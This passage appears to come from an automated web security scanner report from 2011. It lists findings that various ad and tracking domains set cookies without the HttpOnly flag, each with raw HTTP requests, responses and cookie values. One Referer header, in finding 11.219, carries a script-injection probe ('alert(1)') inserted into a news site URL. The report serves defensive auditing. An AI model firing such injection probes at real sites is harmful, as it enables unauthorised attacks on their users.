Am2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz
59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuV6ONoHWtyiE_pNTuBZXnxgi4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: fc=4eSwQ3g1tAr0ps2Jsn-_eWoVwDvXeel54vyZXm8QLISGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOemGrp6DlmlaGmQt2qcOx1gg; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: pf=xRx_CDsAoWoco5w3DRjwyiu1jndAIQSkfSH7IRm-hA2JwV9kSIzX4BtZ7vBDkFqiIdgy2Lx6nc2yvIrh5BEVs34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 17:37:28 GMT
Content-Length: 9353


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

11.214. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=6 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 14:48:47 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4510090875291133304&fpid=6&nu=n&t=
...[SNIP]...

11.215. http://ads.roiserver.com/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?clid=e5656a6&rand=1296224076876&sid= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Set-Cookie: sadscpax=e5656a6-; Domain=ads.roiserver.com; Expires=Sat, 29-Jan-2011 17:08:00 GMT; Path=/
Location: http://clkrd.com/ad.php?o=acai
Content-Length: 0
Date: Fri, 28 Jan 2011 16:44:00 GMT
Connection: close


11.216. http://adsfac.us/ag.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=QAN007.310005.0&source=js&ord=5596043 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 1042
Content-Type: text/javascript
Expires: Fri, 28 Jan 2011 23:44:09 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSQAN007310005=uid=14877790; expires=Sat, 29-Jan-2011 23:45:08 GMT; path=/
Set-Cookie: FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; expires=Mon, 28-Feb-2011 23:45:08 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Fri, 28 Jan 2011 23:45:09 GMT
Connection: close

if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://ADSFAC.US/link.asp?cc=QAN007.310005.0&CreativeID=30281';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=30281'}
...[SNIP]...

11.217. http://adsfac.us/link.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /link.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.asp?cc=QAN007.310005.0&CreativeID=30281 HTTP/1.1
Host: adsfac.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 276
Content-Type: text/html
Expires: Sat, 29 Jan 2011 05:19:26 GMT
Location: http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&utm_source=QFOnineAds&utm_content=&utm_term=sydney
Server: Microsoft-IIS/7.0
Set-Cookie: FSQAN007=pctl=310005&FM30281=1&pdc=4045&pctc=30281&FQ=1&pctcrt=1&pctm=1&FL310005=1&fpt=0%2C310005%2C&pct%5Fdate=4045; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&amp;utm_medium=listing&amp;u
...[SNIP]...

11.218. http://adsfac.us/link.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /link.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.asp HTTP/1.1
Host: adsfac.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 152
Content-Type: text/html
Expires: Sat, 29 Jan 2011 05:19:26 GMT
Location: http://www.facilitatedigital.us
Server: Microsoft-IIS/7.0
Set-Cookie: FS=fpt=0%2C0%2C&pctcrt=1&pctm=1&pctl=0&FM1=1&pdc=4045&pctc=1&FL0=1&FQ=1; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.facilitatedigital.us">here</a>.</body>

11.219. http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d791689/21/39823749/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d791689/21/39823749/decide.php?ord=1296226106 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:41 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Thu, 28 Jan 2010 14:48:40 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; expires=Tue, 20 Mar 2012 06:48:41 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; expires=Tue, 20-Mar-2012 06:48:41 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.220. http://ar.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
Set-Cookie: spvdr=vd=55564d24-301b-478f-82b3-5dcbbd104f3e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:43 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:42 GMT
Connection: close
Content-Length: 18354
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...

11.221. http://ar.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yzncppn3i5kxmq55usvxbp45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=yzncppn3i5kxmq55usvxbp45; path=/; HttpOnly
Set-Cookie: spvdr=vd=89db16b4-a732-4dce-8ce2-a6fc021fefde&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:45 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: par=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:16:45 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:44 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


11.222. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296224089.327,wait-%3E10000,&1296224142212 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_G=method->-1,ts->1296224088; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:14:50 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

11.223. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p85001580=exp=21&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:19:48 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296263988%2E989%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 01:32:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27557

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"59007464",Pid:"p45555483",Arc:"38601779",Location:CO
...[SNIP]...

11.224. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:14:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 14:14:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296224088; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
